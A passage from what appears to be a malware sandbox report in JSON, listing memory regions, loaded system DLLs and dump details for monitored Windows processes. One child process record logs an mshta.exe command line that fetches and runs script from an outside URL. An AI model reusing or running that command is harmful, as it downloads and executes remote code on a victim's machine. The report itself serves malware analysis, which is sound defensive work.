null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_985", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:03.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_986", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:03.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_987", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:03.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": 
null, "id": "region_988", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:03.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52166656, "type": "region", "version": 1 }, "end_va": 53215231, "entry_point": 0, "filename": null, "id": "region_1128", "name": "private_0x00000000031c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52166656, "timestamp": "00:01:04.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1129", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:04.144", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1130", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:01:04.145", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 57147391, "entry_point": 0, "filename": null, "id": "region_1133", "name": "private_0x0000000003580000", "norm_filename": null, "region_type": "private_memory", "start_va": 56098816, "timestamp": "00:01:04.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791726948352, "type": "region", "version": 1 }, "end_va": 8791727046655, "entry_point": 8791726955512, "filename": "\\Windows\\System32\\dhcpcsvc.dll", "id": "region_1134", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791726948352, "timestamp": "00:01:04.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791727079424, "type": "region", "version": 1 }, "end_va": 8791727149055, "entry_point": 8791727085228, "filename": "\\Windows\\System32\\dhcpcsvc6.dll", "id": "region_1135", "name": "dhcpcsvc6.dll", "norm_filename": "c:\\windows\\system32\\dhcpcsvc6.dll", "region_type": "memory_mapped_file", "start_va": 8791727079424, "timestamp": "00:01:04.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, 
"start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:01:04.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 57212928, "type": "region", "version": 1 }, "end_va": 58261503, "entry_point": 0, "filename": null, "id": "region_1137", "name": "private_0x0000000003690000", "norm_filename": null, "region_type": "private_memory", "start_va": 57212928, "timestamp": "00:01:04.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581261824, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1138", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:04.210", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 
8796092653568, "timestamp": "00:01:04.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49741824, "type": "region", "version": 1 }, "end_va": 50790399, "entry_point": 0, "filename": null, "id": "region_1146", "name": "private_0x0000000002f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 49741824, "timestamp": "00:01:04.326", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1147", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:04.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3477503, "entry_point": 3473408, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1148", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 3473408, "timestamp": "00:01:04.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1153", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:04.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5705727, "entry_point": 0, "filename": null, "id": "region_1154", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:04.350", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566654424, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1158", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:04.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5709823, "entry_point": 0, "filename": null, "id": "region_1159", "name": 
"pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:01:04.411", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_5", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000731-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_731", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_732", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_733", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_734", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_735", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:02.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 
0, "filename": null, "id": "region_736", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000737-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_737", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 4288479232, "type": "region", "version": 1 }, "end_va": 4288544767, "entry_point": 4288490532, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_738", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 4288479232, "timestamp": "00:01:02.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_739", "name": 
"apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:02.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_740", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000741-addr_0x000007fffffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092841983, "entry_point": 0, "filename": null, "id": "region_741", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000742-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_742", "name": 
"private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:02.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000743-addr_0x00000000002d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_743", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:02.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_744", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:02.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_745", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 
8791758012416, "timestamp": "00:01:02.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_746", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:03.000", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_747", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:03.000", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000748-addr_0x0000000000230000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2359295, "entry_point": 0, "filename": null, "id": "region_748", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000749-addr_0x00000000003d0000-size_0x0000000000100000-perm_rw.bin", "flags": 
[ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_749", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_750", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_751", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 
8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_752", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:03.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_753", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_754", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:03.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_755", "name": 
"advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:03.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000756-addr_0x0000000000630000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_756", "name": "private_0x0000000000630000", "norm_filename": null, "region_type": "private_memory", "start_va": 6488064, "timestamp": "00:01:03.005", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000757-addr_0x00000000004d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5046272, "type": "region", "version": 1 }, "end_va": 6094847, "entry_point": 0, "filename": null, "id": "region_757", "name": "private_0x00000000004d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5046272, "timestamp": "00:01:03.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": 
"region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270096896, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_760", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:03.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_762", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:03.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_763", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:03.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_764", "name": "user32.dll", "norm_filename": 
"c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:03.154", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_765", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:03.155", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_766", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:03.156", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_767", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:03.157", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_768", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:03.158", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_769", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791787438080, "timestamp": 